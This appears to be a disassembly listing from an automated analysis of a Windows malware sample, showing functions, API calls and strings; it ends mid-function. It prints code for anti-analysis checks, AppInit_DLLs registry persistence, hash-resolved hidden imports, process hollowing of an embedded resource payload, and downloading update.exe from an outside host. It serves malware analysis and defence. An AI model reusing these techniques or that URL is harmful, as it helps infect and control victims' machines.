00413240 mov cx, word ptr [00412148h] 6264
00413247 mov word ptr [ebp-68h], cx
0041324B mov dl, byte ptr [0041214Ah] 00
00413251 mov byte ptr [ebp-66h], dl
00413254 push 0000005Dh
00413256 push 00000000h
00413258 lea eax, dword ptr [ebp-65h]
0041325B push eax
0041325C call 00415F8Fh
00413261 add esp, 0Ch
00413264 xor ecx, ecx
00413266 mov word ptr [ebp-04h], cx
0041326A jmp 00413278h
0041326C mov dx, word ptr [ebp-04h] xrefs 004132AC
00413270 add dx, 0001h
00413274 mov word ptr [ebp-04h], dx
00413278 movzx eax, word ptr [ebp-04h] xrefs 0041326A
0041327C cmp eax, 03h
0041327F jnl 004132AEh
00413281 push 00000004h
00413283 lea ecx, dword ptr [ebp-000003F0h]
00413289 push ecx
0041328A movzx edx, word ptr [ebp-04h]
0041328E imul edx, edx, 64h
00413291 lea eax, dword ptr [ebp+edx-00000580h]
00413298 push eax
00413299 call 00413450h
0041329E add esp, 0Ch
004132A1 movzx ecx, al
004132A4 test ecx, ecx
004132A6 je 004132ACh
004132A8 mov al, 01h
004132AA jmp 004132D3h
004132AC jmp 0041326Ch xrefs 004132A6
004132AE push 00000004h xrefs 0041327F
004132B0 lea edx, dword ptr [ebp-000001FCh]
004132B6 push edx
004132B7 lea eax, dword ptr [ebp-00000454h]
004132BD push eax
004132BE call 00413450h
004132C3 add esp, 0Ch
004132C6 movzx ecx, al
004132C9 test ecx, ecx
004132CB je 004132D1h
004132CD mov al, 01h
004132CF jmp 004132D3h
004132D1 xor al, al xrefs 004132CB
004132D3 pop edi xrefs 004132CF, 004132AA, 00412F8F
004132D4 pop esi
004132D5 mov esp, ebp
004132D7 pop ebp
004132D8 ret function end
Function 004147E0, API count: 0, instr count: 140
Strings
  • %APPDATA%, va: 00411C78
  • %TEMP%, va: 00411C84
  • %WINDIR%\WEB, va: 00411C8C
  • RT_RCDATA, va: 00411C9C
Address Instruction Meta Information
004147E0 push ebp xrefs 004161E4
004147E1 mov ebp, esp
004147E3 sub esp, 00000130h
004147E9 call 00415D00h
004147EE call 004122B0h
004147F3 movzx eax, al
004147F6 test eax, eax
004147F8 jne 0041482Ah
004147FA call 00412540h
004147FF movzx ecx, al
00414802 test ecx, ecx
00414804 jne 0041482Ah
00414806 call 004127E0h
0041480B movzx edx, al
0041480E test edx, edx
00414810 jne 0041482Ah
00414812 call 004129B0h
00414817 movzx eax, al
0041481A test eax, eax
0041481C jne 0041482Ah
0041481E call 00412F30h
00414823 movzx ecx, al
00414826 test ecx, ecx
00414828 je 00414831h
0041482A push 00000000h xrefs 004147F8, 00414804, 00414810, 0041481C
0041482C call 00414AA0h
00414831 push 00411C78h ASCII "%APPDATA%" xrefs 00414828
00414836 call 004145B0h
0041483B add esp, 04h
0041483E mov dword ptr [ebp-00000128h], eax
00414844 mov edx, dword ptr [ebp-00000128h]
0041484A push edx
0041484B call 00414630h
00414850 add esp, 04h
00414853 push 00411C84h ASCII "%TEMP%"
00414858 call 004145B0h
0041485D add esp, 04h
00414860 mov dword ptr [ebp-00000114h], eax
00414866 mov eax, dword ptr [ebp-00000114h]
0041486C push eax
0041486D call 00414630h
00414872 add esp, 04h
00414875 push 00411C8Ch ASCII "%WINDIR%\WEB"
0041487A call 004145B0h
0041487F add esp, 04h
00414882 mov dword ptr [ebp-00000124h], eax
00414888 mov ecx, dword ptr [ebp-00000124h]
0041488E push ecx
0041488F call 00414630h
00414894 add esp, 04h
00414897 call 00412190h
0041489C movzx edx, al
0041489F test edx, edx
004148A1 je 004148AAh
004148A3 push 00000000h
004148A5 call 00414AA0h
004148AA call 004146E0h xrefs 004148A1
004148AF push 00000104h
004148B4 lea eax, dword ptr [ebp-00000110h]
004148BA push eax
004148BB push 00000000h
004148BD call 00414220h
004148C2 push 00411C9Ch ASCII "RT_RCDATA"
004148C7 push 00000065h
004148C9 push 00000000h
004148CB call 00414AC0h
004148D0 mov dword ptr [ebp-00000120h], eax
004148D6 cmp dword ptr [ebp-00000120h], 00000000h
004148DD jne 004148E6h
004148DF xor eax, eax
004148E1 jmp 004149C4h
004148E6 mov ecx, dword ptr [ebp-00000120h] xrefs 004148DD
004148EC push ecx
004148ED push 00000000h
004148EF call 00414AF0h
004148F4 mov dword ptr [ebp-04h], eax
004148F7 mov edx, dword ptr [ebp-00000120h]
004148FD push edx
004148FE push 00000000h
00414900 call 00414B10h
00414905 mov dword ptr [ebp-0000011Ch], eax
0041490B cmp dword ptr [ebp-0000011Ch], 00000000h
00414912 jne 0041491Bh
00414914 xor eax, eax
00414916 jmp 004149C4h
0041491B mov eax, dword ptr [ebp-0000011Ch] xrefs 00414912
00414921 push eax
00414922 call 00414B30h
00414927 mov dword ptr [ebp-00000118h], eax
0041492D cmp dword ptr [ebp-00000118h], 00000000h
00414934 jne 0041493Dh
00414936 xor eax, eax
00414938 jmp 004149C4h
0041493D call 00414B80h xrefs 00414934
00414942 test eax, eax
00414944 je 00414973h
00414946 lea ecx, dword ptr [ebp-00000130h]
0041494C push ecx
0041494F push 00000000h Count = 2
00414951 push 00414DC0h
00414958 push 00000000h Count = 2
0041495A call 00414B50h
0041495F mov dword ptr [ebp-0000012Ch], eax
00414965 push FFFFFFFFh
00414967 mov edx, dword ptr [ebp-0000012Ch]
0041496D push edx
0041496E call 00414590h
00414977 push 00000000h Count = 3
00414979 push 00413ED0h
00414980 push 00000000h Count = 2
00414982 call 00414B50h
0041498B push 00000000h Count = 3
0041498D push 004153C0h
00414994 push 00000000h Count = 2
00414996 call 00414B50h
0041499B push 00000007h
0041499D push 00000000h
0041499F mov eax, dword ptr [ebp-04h]
004149A2 push eax
004149A3 mov ecx, dword ptr [ebp-00000118h]
004149A9 push ecx
004149AA call 004146A0h
004149AF add esp, 10h
004149B2 push eax
004149B3 lea edx, dword ptr [ebp-00000110h]
004149B9 push edx
004149BA call 00414290h
004149BF add esp, 08h
004149C2 xor eax, eax
004149C4 mov esp, ebp xrefs 00414938, 00414916, 004148E1
004149C6 pop ebp
004149C7 retn 0010h function end
Function 00413790, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCloseKey.ADVAPI32, ref: 004137A6
Address Instruction Meta Information
00413790 push ebp xrefs 00413555, 00413529, 00413543, 004147CA, 004135DD
00413791 mov ebp, esp
00413793 mov eax, dword ptr [ebp+08h]
00413796 push eax
00413797 push 647832FCh
0041379C push DB355534h
004137A1 call 00415E40h
004137A6 call eax RegCloseKey@ADVAPI32.DLL (Hidden Import)
004137A8 pop ebp
004137A9 retn 0004h function end
Function 004146E0, API count: 0, instr count: 70
Strings
  • mssys.dll, va: 00411C10
  • %WINDIR%, va: 00411C1C
  • %s%s, va: 00411C28
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\, va: 00411C30
  • AppInit_DLLs, va: 00411C68
Address Instruction Meta Information
004146E0 push ebp xrefs 004148AA
004146E1 mov ebp, esp
004146E3 sub esp, 00000114h
004146E9 push 00411C10h ASCII "mssys.dll"
004146EE push 00411C1Ch ASCII "%WINDIR%"
004146F3 call 004145B0h
004146F8 add esp, 04h
004146FB push eax
004146FC push 00411C28h ASCII "%s%s"
00414701 lea eax, dword ptr [ebp-00000108h]
00414707 push eax
00414708 call 004141C0h
0041470D add esp, 10h
00414710 lea ecx, dword ptr [ebp-00000108h]
00414716 push ecx
00414717 call 004137E0h
0041471C neg eax
0041471E sbb eax, eax
00414720 add eax, 01h
00414723 cmp eax, FFFFFFFFh
00414726 je 00414768h
00414728 push 00000000h
0041472A push 00000004h
0041472C push 00000001h
00414730 push 00000000h Count = 2
00414732 push 40000000h
00414737 lea edx, dword ptr [ebp-00000108h]
0041473D push edx
0041473E call 00413F90h
00414743 mov dword ptr [ebp-00000114h], eax
00414749 push 00000000h
0041474B lea eax, dword ptr [ebp-00000110h]
00414751 push eax
00414752 push 00010600h
00414757 push 00401320h
0041475C mov ecx, dword ptr [ebp-00000114h]
00414762 push ecx
00414763 call 00413FF0h
00414768 mov dword ptr [ebp-0000010Ch], 00000000h xrefs 00414726
00414772 push 00000000h
00414774 lea edx, dword ptr [ebp-0000010Ch]
0041477A push edx
0041477B push 00000000h
0041477D push 000F003Fh
00414786 push 00000000h Count = 3
00414788 push 00411C30h ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"
0041478D push 80000002h
00414792 call 00414A30h
00414797 lea eax, dword ptr [ebp-00000108h]
0041479D push eax
0041479E call 00415EDCh
004147A3 add esp, 04h
004147A6 push eax
004147A7 lea ecx, dword ptr [ebp-00000108h]
004147AD push ecx
004147AE push 00000001h
004147B0 push 00000000h
004147B2 push 00411C68h ASCII "AppInit_DLLs"
004147B7 mov edx, dword ptr [ebp-0000010Ch]
004147BD push edx
004147BE call 00414A70h
004147C3 mov eax, dword ptr [ebp-0000010Ch]
004147C9 push eax
004147CA call 00413790h
004147CF mov esp, ebp
004147D1 pop ebp
004147D2 ret function end
Function 004162EC, API count: 1, instr count: 5
APIs
  • HeapFree.KERNEL32, ref: 004162F8
Address Instruction Meta Information
004162EC push dword ptr [esp+04h] xrefs 00416242, 004160FD
004162F0 push 00000000h
004162F2 push dword ptr [00418CE0h]
004162F8 call dword ptr [00401008h] HeapFree@KERNEL32.DLL (Import)
004162FE ret function end
Function 00414A30, API count: 1, instr count: 26
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCreateKeyExA.ADVAPI32, ref: 00414A66
Address Instruction Meta Information
00414A30 push ebp xrefs 00414792
00414A31 mov ebp, esp
00414A33 mov eax, dword ptr [ebp+28h]
00414A36 push eax
00414A37 mov ecx, dword ptr [ebp+24h]
00414A3A push ecx
00414A3B mov edx, dword ptr [ebp+20h]
00414A3E push edx
00414A3F mov eax, dword ptr [ebp+1Ch]
00414A42 push eax
00414A43 mov ecx, dword ptr [ebp+18h]
00414A46 push ecx
00414A47 mov edx, dword ptr [ebp+14h]
00414A4A push edx
00414A4B mov eax, dword ptr [ebp+10h]
00414A4E push eax
00414A4F mov ecx, dword ptr [ebp+0Ch]
00414A52 push ecx
00414A53 mov edx, dword ptr [ebp+08h]
00414A56 push edx
00414A57 push 647832FCh
00414A5C push 90A097E6h
00414A61 call 00415E40h
00414A66 call eax RegCreateKeyExA@ADVAPI32.DLL (Hidden Import)
00414A68 pop ebp
00414A69 retn 0024h function end
Function 00414DC0, API count: 2, instr count: 134
APIs
    • WSAStartup.WS2_32, ref: 00414BB5
    • WSASocketA.WS2_32, ref: 00414BC7
    • WSACleanup.WS2_32, ref: 00414BDC
    • gethostbyname.WS2_32, ref: 00414BEE
    • WSACleanup.WS2_32, ref: 00414C03
    • htons.WS2_32, ref: 00414C10
    • inet_ntoa.WS2_32, ref: 00414C37
    • inet_addr.WS2_32, ref: 00414C3E
    • WSAConnect.WS2_32, ref: 00414C62
    • WSACleanup.WS2_32, ref: 00414C6D
  • send.WS2_32, ref: 00414E28
  • recv.WS2_32, ref: 00414E50
Strings
  • http://mahaajan.in/dd/, va: 00401118
  • %s %s, va: 00411BCC
  • http://%s%sdata/update.exe, va: 00411BD4
Address Instruction Meta Information
00414DC0 push ebp
00414DC1 mov ebp, esp
00414DC3 mov eax, 00001728h
00414DC8 call 004163B4h
00414DCD call 00414C90h
00414DD2 mov dword ptr [ebp-04h], eax
00414DD5 push 00000400h
00414DDA push 00000000h
00414DDC lea eax, dword ptr [ebp-00000408h]
00414DE2 push eax
00414DE3 call 00415F8Fh
00414DE8 add esp, 0Ch
00414DEB push 00401118h ASCII "http://mahaajan.in/dd/"
00414DF0 call 00414BA0h
00414DF5 add esp, 04h
00414DF8 mov dword ptr [ebp-00000410h], eax
00414DFE cmp dword ptr [ebp-00000410h], FFFFFFFFh
00414E05 jne 00414E0Eh
00414E07 xor eax, eax
00414E09 jmp 00414FD8h
00414E0E push 00000000h xrefs 00414E05
00414E10 mov ecx, dword ptr [ebp-04h]
00414E13 push ecx
00414E14 call 00415EDCh
00414E19 add esp, 04h
00414E1C push eax
00414E1D mov edx, dword ptr [ebp-04h]
00414E20 push edx
00414E21 mov eax, dword ptr [ebp-00000410h]
00414E27 push eax
00414E28 call dword ptr [00401064h] send@WS2_32.DLL (Import)
00414E2E push 00000000h xrefs 00414EFC
00414E30 push 00000001h
00414E32 lea ecx, dword ptr [ebp-00000408h]
00414E38 push ecx
00414E39 call 00415EDCh
00414E3E add esp, 04h
00414E41 lea edx, dword ptr [ebp+eax-00000408h]
00414E48 push edx
00414E49 mov eax, dword ptr [ebp-00000410h]
00414E4F push eax
00414E50 call dword ptr [0040105Ch] recv@WS2_32.DLL (Import)
00414E56 mov dword ptr [ebp-00000614h], eax
00414E5C cmp dword ptr [ebp-00000614h], 00000000h
00414E63 je 00414F01h
00414E69 mov dword ptr [ebp-00000618h], 00000000h
00414E73 jmp 00414E84h
00414E75 mov ecx, dword ptr [ebp-00000618h] xrefs 00414EF7
00414E7B add ecx, 01h
00414E7E mov dword ptr [ebp-00000618h], ecx
00414E84 mov edx, dword ptr [ebp-00000618h] xrefs 00414E73
00414E8A movsx eax, byte ptr [ebp+edx-00000408h]
00414E92 test eax, eax
00414E94 je 00414EFCh
00414E96 mov ecx, dword ptr [ebp-00000618h]
00414E9C movsx edx, byte ptr [ebp+ecx-00000408h]
00414EA4 cmp edx, 0Dh
00414EA7 jne 00414EF7h
00414EA9 mov eax, dword ptr [ebp-00000618h]
00414EAF movsx ecx, byte ptr [ebp+eax-00000407h]
00414EB7 cmp ecx, 0Ah
00414EBA jne 00414EF7h
00414EBC mov edx, dword ptr [ebp-00000618h]
00414EC2 movsx eax, byte ptr [ebp+edx-00000406h]
00414ECA cmp eax, 0Dh
00414ECD jne 00414EF7h
00414ECF mov ecx, dword ptr [ebp-00000618h]
00414ED5 movsx edx, byte ptr [ebp+ecx-00000405h]
00414EDD cmp edx, 0Ah
00414EE0 jne 00414EF7h
00414EE2 mov eax, dword ptr [ebp-00000618h]
00414EE8 lea ecx, dword ptr [ebp+eax-00000404h]
00414EEF mov dword ptr [ebp-0000040Ch], ecx
00414EF5 jmp 00414EFCh
00414EF7 jmp 00414E75h xrefs 00414EA7, 00414EBA, 00414ECD, 00414EE0
00414EFC jmp 00414E2Eh xrefs 00414E94, 00414EF5
00414F01 push 00411BC4h xrefs 00414E63
00414F06 mov edx, dword ptr [ebp-0000040Ch]
00414F0C push edx
00414F0D call 00416027h
00414F12 add esp, 08h
00414F15 mov dword ptr [ebp-00000610h], eax
00414F1B mov dword ptr [ebp-0000161Ch], 00000001h
00414F25 jmp 00414F36h
00414F27 mov eax, dword ptr [ebp-0000161Ch] xrefs 00414F5B
00414F2D add eax, 01h
00414F30 mov dword ptr [ebp-0000161Ch], eax
00414F36 cmp dword ptr [ebp-0000161Ch], 04h xrefs 00414F25
00414F3D jnc 00414F5Dh
00414F3F push 00411BC8h
00414F44 push 00000000h
00414F46 call 00416027h
00414F4B add esp, 08h
00414F4E mov ecx, dword ptr [ebp-0000161Ch]
00414F54 mov dword ptr [ebp+ecx*4-00000610h], eax
00414F5B jmp 00414F27h
00414F5D mov edx, dword ptr [ebp-0000060Ch] xrefs 00414F3D
00414F63 push edx
00414F64 mov eax, dword ptr [ebp-00000610h]
00414F6A push eax
00414F6B push 00411BCCh ASCII "%s %s"
00414F70 lea ecx, dword ptr [ebp-00001618h]
00414F76 push ecx
00414F77 call 004141C0h
00414F7C add esp, 10h
00414F7F lea edx, dword ptr [ebp-00001618h]
00414F85 push edx
00414F86 call 00414CC0h
00414F8B add esp, 04h
00414F8E movzx eax, al
00414F91 test eax, eax
00414F93 jne 00414FD6h
00414F95 push 00401118h ASCII "http://mahaajan.in/dd/"
00414F9A push 00411BD4h ASCII "http://%s%sdata/update.exe"
00414F9F lea ecx, dword ptr [ebp-00001728h]
00414FA5 push ecx
00414FA6 call 004141C0h
00414FAB add esp, 0Ch
00414FB0 push 00000000h Count = 2
00414FB2 lea edx, dword ptr [ebp-00001728h]
00414FB8 push edx
00414FB9 push 00000000h
00414FBB call 00415030h
00414FC0 lea eax, dword ptr [ebp-00001728h]
00414FC6 push eax
00414FC7 call 00415120h
00414FCC add esp, 04h
00414FCF push 00000000h
00414FD1 call 00414AA0h
00414FD6 xor eax, eax xrefs 00414F93
00414FD8 mov esp, ebp xrefs 00414E09
00414FDA pop ebp
00414FDB retn 0004h function end
Function 004160F5, API count: 1, instr count: 19
APIs
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041610D
Address Instruction Meta Information
004160F5 mov eax, dword ptr [esp+04h] xrefs 004155D9, 00415496
004160F9 push esi
004160FA mov esi, dword ptr [eax]
004160FC push eax
004160FD call 004162ECh
00416102 cmp esi, FFFFFFFFh
00416105 pop ecx
00416106 jne 0041610Ch
00416108 xor eax, eax
0041610A pop esi
0041610B ret function end
0041610C push esi xrefs 00416106
0041610D call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416113 neg eax
00416115 sbb eax, eax
00416117 neg eax
00416119 dec eax
0041611A pop esi
0041611B ret function end
Function 00415760, API count: 1, instr count: 157
APIs
  • LoadLibraryA.KERNEL32, ref: 004158E6
Address Instruction Meta Information
00415760 push ebp xrefs 00415D37, 00415925, 00415E2B
00415761 mov ebp, esp
00415763 sub esp, 00000130h
00415769 mov eax, dword ptr [ebp+08h]
0041576C mov ecx, dword ptr [eax+3Ch]
0041576F mov edx, dword ptr [ebp+08h]
00415772 lea eax, dword ptr [edx+ecx+18h]
00415776 mov dword ptr [ebp-14h], eax
00415779 mov ecx, dword ptr [ebp-14h]
0041577C mov edx, dword ptr [ebp+08h]
0041577F add edx, dword ptr [ecx+60h]
00415782 mov dword ptr [ebp-10h], edx
00415785 mov dword ptr [ebp-08h], 00000000h
0041578C cmp dword ptr [ebp+10h], 00000000h
00415790 je 004157E5h
00415792 mov eax, dword ptr [ebp+10h]
00415795 movsx ecx, byte ptr [eax]
00415798 cmp ecx, 23h
0041579B jne 004157E5h
0041579D mov edx, dword ptr [ebp+10h] xrefs 004157C9
004157A0 add edx, 01h
004157A3 mov dword ptr [ebp+10h], edx
004157A6 mov eax, dword ptr [ebp+10h]
004157A9 movsx ecx, byte ptr [eax]
004157AC test ecx, ecx
004157AE je 004157CBh
004157B0 mov edx, dword ptr [ebp-08h]
004157B3 imul edx, edx, 0Ah
004157B6 mov dword ptr [ebp-08h], edx
004157B9 mov eax, dword ptr [ebp+10h]
004157BC movsx ecx, byte ptr [eax]
004157BF mov edx, dword ptr [ebp-08h]
004157C2 lea eax, dword ptr [edx+ecx-30h]
004157C6 mov dword ptr [ebp-08h], eax
004157C9 jmp 0041579Dh
004157CB mov ecx, dword ptr [ebp-10h] xrefs 004157AE
004157CE mov edx, dword ptr [ebp-08h]
004157D1 sub edx, dword ptr [ecx+10h]
004157D4 mov dword ptr [ebp-08h], edx
004157D7 mov eax, dword ptr [ebp-10h]
004157DA mov ecx, dword ptr [ebp-08h]
004157DD cmp ecx, dword ptr [eax+14h]
004157E0 jc 004157E3h
004157E2 int3
004157E3 jmp 00415851h xrefs 004157E0
004157E5 mov edx, dword ptr [ebp-10h] xrefs 00415790, 0041579B
004157E8 mov eax, dword ptr [ebp+08h]
004157EB add eax, dword ptr [edx+20h]
004157EE mov dword ptr [ebp-24h], eax
004157F1 mov ecx, dword ptr [ebp-10h]
004157F4 mov edx, dword ptr [ebp+08h]
004157F7 add edx, dword ptr [ecx+24h]
004157FA mov dword ptr [ebp-20h], edx
004157FD mov dword ptr [ebp-1Ch], 00000000h
00415804 jmp 0041580Fh
00415806 mov eax, dword ptr [ebp-1Ch] xrefs 00415843
00415809 add eax, 01h
0041580C mov dword ptr [ebp-1Ch], eax
0041580F mov ecx, dword ptr [ebp-10h] xrefs 00415804
00415812 mov edx, dword ptr [ebp-1Ch]
00415815 cmp edx, dword ptr [ecx+18h]
00415818 jnc 00415845h
0041581A mov eax, dword ptr [ebp-1Ch]
0041581D mov ecx, dword ptr [ebp-24h]
00415820 mov edx, dword ptr [ebp+08h]
00415823 add edx, dword ptr [ecx+eax*4]
00415826 push edx
00415827 call 00415710h
0041582C add esp, 04h
0041582F cmp eax, dword ptr [ebp+0Ch]
00415832 jne 00415843h
00415834 mov eax, dword ptr [ebp-1Ch]
00415837 mov ecx, dword ptr [ebp-20h]
0041583A movzx edx, word ptr [ecx+eax*2]
0041583E mov dword ptr [ebp-08h], edx
00415841 jmp 00415845h
00415843 jmp 00415806h xrefs 00415832
00415845 mov eax, dword ptr [ebp-10h] xrefs 00415818, 00415841
00415848 mov ecx, dword ptr [ebp-1Ch]
0041584B cmp ecx, dword ptr [eax+18h]
0041584E jne 00415851h
00415850 int3
00415851 mov edx, dword ptr [ebp-10h] xrefs 0041584E, 004157E3
00415854 mov eax, dword ptr [ebp+08h]
00415857 add eax, dword ptr [edx+1Ch]
0041585A mov dword ptr [ebp-18h], eax
0041585D mov ecx, dword ptr [ebp-08h]
00415860 mov edx, dword ptr [ebp-18h]
00415863 mov eax, dword ptr [ebp+08h]
00415866 add eax, dword ptr [edx+ecx*4]
00415869 mov dword ptr [ebp-0Ch], eax
0041586C mov ecx, dword ptr [ebp-0Ch]
0041586F cmp ecx, dword ptr [ebp+08h]
00415872 jne 00415875h
00415874 int3
00415875 mov edx, dword ptr [ebp-14h] xrefs 00415872
00415878 mov eax, dword ptr [edx+64h]
0041587B mov dword ptr [ebp-04h], eax
0041587E mov ecx, dword ptr [ebp-0Ch]
00415881 cmp ecx, dword ptr [ebp-10h]
00415884 jc 0041592Fh
0041588A mov edx, dword ptr [ebp-10h]
0041588D add edx, dword ptr [ebp-04h]
00415890 cmp dword ptr [ebp-0Ch], edx
00415893 jnc 0041592Fh
00415899 mov eax, dword ptr [ebp-0Ch]
0041589C mov dword ptr [ebp+10h], eax
0041589F mov dword ptr [ebp-28h], 00000000h
004158A6 mov ecx, dword ptr [ebp+10h] xrefs 004158D2
004158A9 movsx edx, byte ptr [ecx]
004158AC cmp edx, 2Eh
004158AF je 004158D4h
004158B1 mov eax, dword ptr [ebp-28h]
004158B4 mov ecx, dword ptr [ebp+10h]
004158B7 mov dl, byte ptr [ecx]
004158B9 mov byte ptr [ebp+eax-00000130h], dl
004158C0 mov eax, dword ptr [ebp-28h]
004158C3 add eax, 01h
004158C6 mov dword ptr [ebp-28h], eax
004158C9 mov ecx, dword ptr [ebp+10h]
004158CC add ecx, 01h
004158CF mov dword ptr [ebp+10h], ecx
004158D2 jmp 004158A6h
004158D4 mov edx, dword ptr [ebp-28h] xrefs 004158AF
004158D7 mov byte ptr [ebp+edx-00000130h], 00000000h
004158DF lea eax, dword ptr [ebp-00000130h]
004158E5 push eax
004158E6 call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
004158EC mov dword ptr [ebp+08h], eax
004158EF cmp dword ptr [ebp+08h], 00000000h
004158F3 jne 004158F6h
004158F5 int3
004158F6 mov ecx, dword ptr [ebp+10h] xrefs 004158F3
004158F9 add ecx, 01h
004158FC mov dword ptr [ebp+10h], ecx
004158FF mov edx, dword ptr [ebp+10h]
00415902 movsx eax, byte ptr [edx]
00415905 cmp eax, 23h
00415908 je 00415919h
0041590A mov ecx, dword ptr [ebp+10h]
0041590D push ecx
0041590E call 00415710h
00415913 add esp, 04h
00415916 mov dword ptr [ebp+0Ch], eax
00415919 mov edx, dword ptr [ebp+10h] xrefs 00415908
0041591C push edx
0041591D mov eax, dword ptr [ebp+0Ch]
00415920 push eax
00415921 mov ecx, dword ptr [ebp+08h]
00415924 push ecx
00415925 call 00415760h
0041592A add esp, 0Ch
0041592D jmp 00415932h
0041592F mov eax, dword ptr [ebp-0Ch] xrefs 00415884, 00415893
00415932 mov esp, ebp xrefs 0041592D
00415934 pop ebp
00415935 ret function end
Function 00414290, API count: 1, instr count: 135
APIs
    • CreateProcessA.KERNEL32, ref: 004144EA
    • VirtualAllocEx.KERNEL32, ref: 00414516
    • WriteProcessMemory.KERNEL32, ref: 00414546
    • SetThreadContext.KERNEL32, ref: 0041456A
    • ResumeThread.KERNEL32, ref: 00414586
  • NtUnmapViewOfSection.NTDLL, ref: 0041430D
Address Instruction Meta Information
00414290 push ebp xrefs 004149BA
00414291 mov ebp, esp
00414293 sub esp, 00000348h
00414299 lea eax, dword ptr [ebp-00000340h]
0041429F push eax
004142A0 call 00414430h
004142A5 push eax
004142A6 call 00414450h
004142AB lea ecx, dword ptr [ebp-58h]
004142AE push ecx
004142AF call 00414470h
004142B4 mov edx, dword ptr [ebp+0Ch]
004142B7 mov dword ptr [ebp-68h], edx
004142BA mov eax, dword ptr [ebp-68h]
004142BD mov dword ptr [ebp-00000344h], eax
004142C3 mov ecx, dword ptr [ebp-00000344h]
004142C9 mov edx, dword ptr [ebp-68h]
004142CC add edx, dword ptr [ecx+3Ch]
004142CF mov dword ptr [ebp-64h], edx
004142D2 mov eax, dword ptr [ebp-64h]
004142D5 mov ecx, dword ptr [eax+34h]
004142D8 mov dword ptr [ebp-5Ch], ecx
004142DB mov edx, dword ptr [ebp-64h]
004142DE mov eax, dword ptr [edx+28h]
004142E1 mov dword ptr [ebp-6Ch], eax
004142E4 lea ecx, dword ptr [ebp-10h]
004142E7 push ecx
004142E8 lea edx, dword ptr [ebp-58h]
004142EB push edx
004142EE push 00000000h Count = 2
004142F0 push 00000024h
004142F6 push 00000000h Count = 3
004142F8 call 00414490h
004142FD push eax
004142FE push 00000000h
00414300 call 004144B0h
00414305 mov eax, dword ptr [ebp-5Ch]
00414308 push eax
00414309 mov ecx, dword ptr [ebp-10h]
0041430C push ecx
0041430D call dword ptr [00401070h] NtUnmapViewOfSection@NTDLL.DLL (Import)
00414313 push 00000004h
00414315 push 00003000h
0041431A mov edx, dword ptr [ebp-64h]
0041431D mov eax, dword ptr [edx+50h]
00414320 push eax
00414321 mov ecx, dword ptr [ebp-5Ch]
00414324 push ecx
00414325 mov edx, dword ptr [ebp-10h]
00414328 push edx
00414329 call 004144F0h
0041432E push 00000000h
00414330 mov eax, dword ptr [ebp-64h]
00414333 mov ecx, dword ptr [eax+54h]
00414336 push ecx
00414337 mov edx, dword ptr [ebp-68h]
0041433A push edx
0041433B mov eax, dword ptr [ebp-5Ch]
0041433E push eax
0041433F mov ecx, dword ptr [ebp-10h]
00414342 push ecx
00414343 call 00414520h
00414348 mov dword ptr [ebp-00000348h], 00000000h
00414352 jmp 00414363h
00414354 mov edx, dword ptr [ebp-00000348h] xrefs 004143B9
0041435A add edx, 01h
0041435D mov dword ptr [ebp-00000348h], edx
00414363 mov eax, dword ptr [ebp-64h] xrefs 00414352
00414366 movzx ecx, word ptr [eax+06h]
0041436A cmp dword ptr [ebp-00000348h], ecx
00414370 jnl 004143BBh
00414372 mov edx, dword ptr [ebp-00000344h]
00414378 mov eax, dword ptr [edx+3Ch]
0041437B mov ecx, dword ptr [ebp-68h]
0041437E lea edx, dword ptr [ecx+eax+000000F8h]
00414385 mov eax, dword ptr [ebp-00000348h]
0041438B imul eax, eax, 28h
0041438E add edx, eax
00414390 mov dword ptr [ebp-60h], edx
00414393 push 00000000h
00414395 mov ecx, dword ptr [ebp-60h]
00414398 mov edx, dword ptr [ecx+10h]
0041439B push edx
0041439C mov eax, dword ptr [ebp-60h]
0041439F mov ecx, dword ptr [ebp-68h]
004143A2 add ecx, dword ptr [eax+14h]
004143A5 push ecx
004143A6 mov edx, dword ptr [ebp-60h]
004143A9 mov eax, dword ptr [ebp-5Ch]
004143AC add eax, dword ptr [edx+0Ch]
004143AF push eax
004143B0 mov ecx, dword ptr [ebp-10h]
004143B3 push ecx
004143B4 call 00414520h
004143B9 jmp 00414354h
004143BB mov dword ptr [ebp-00000340h], 00010002h xrefs 00414370
004143C5 lea edx, dword ptr [ebp-00000340h]
004143CB push edx
004143CC mov eax, dword ptr [ebp-0Ch]
004143CF push eax
004143D0 call 00414450h
004143D5 push 00000000h
004143D7 push 00000004h
004143D9 lea ecx, dword ptr [ebp-5Ch]
004143DC push ecx
004143DD mov edx, dword ptr [ebp-0000029Ch]
004143E3 add edx, 08h
004143E6 push edx
004143E7 mov eax, dword ptr [ebp-10h]
004143EA push eax
004143EB call 00414520h
004143F0 mov ecx, dword ptr [ebp-5Ch]
004143F3 add ecx, dword ptr [ebp-6Ch]
004143F6 mov dword ptr [ebp-00000290h], ecx
004143FC lea edx, dword ptr [ebp-00000340h]
00414402 push edx
00414403 mov eax, dword ptr [ebp-0Ch]
00414406 push eax
00414407 call 00414550h
0041440C mov ecx, dword ptr [ebp-0Ch]
0041440F push ecx
00414410 call 00414570h
00414415 mov edx, dword ptr [ebp-68h]
00414418 push edx
00414419 call 00413F70h
0041441E push FFFFFFFFh
00414420 mov eax, dword ptr [ebp-10h]
00414423 push eax
00414424 call 00414590h
00414429 mov esp, ebp
0041442B pop ebp
0041442C ret function end
Function 00415FF2, API count: 1, instr count: 5
APIs
  • HeapAlloc.KERNEL32, ref: 00415FFE
Address Instruction Meta Information
00415FF2 push dword ptr [esp+04h] xrefs 004145B9, 0041624E
00415FF6 push 00000000h
00415FF8 push dword ptr [00418CE0h]
00415FFE call dword ptr [00401000h] HeapAlloc@KERNEL32.DLL (Import)
00416004 ret function end
Function 004161F3, API count: 1, instr count: 7
APIs
  • GetProcessHeap.KERNEL32, ref: 004161F3
Address Instruction Meta Information
004161F3 call dword ptr [00401018h] GetProcessHeap@KERNEL32.DLL (Import)
004161F9 xor ecx, ecx
004161FB test eax, eax
004161FD sete cl
00416200 mov dword ptr [00418CE0h], eax
00416205 mov eax, ecx
00416207 ret function end
Function 004145F0, API count: 0, instr count: 22
Address Instruction Meta Information
004145F0 push ebp xrefs 00414675
004145F1 mov ebp, esp
004145F3 push ecx
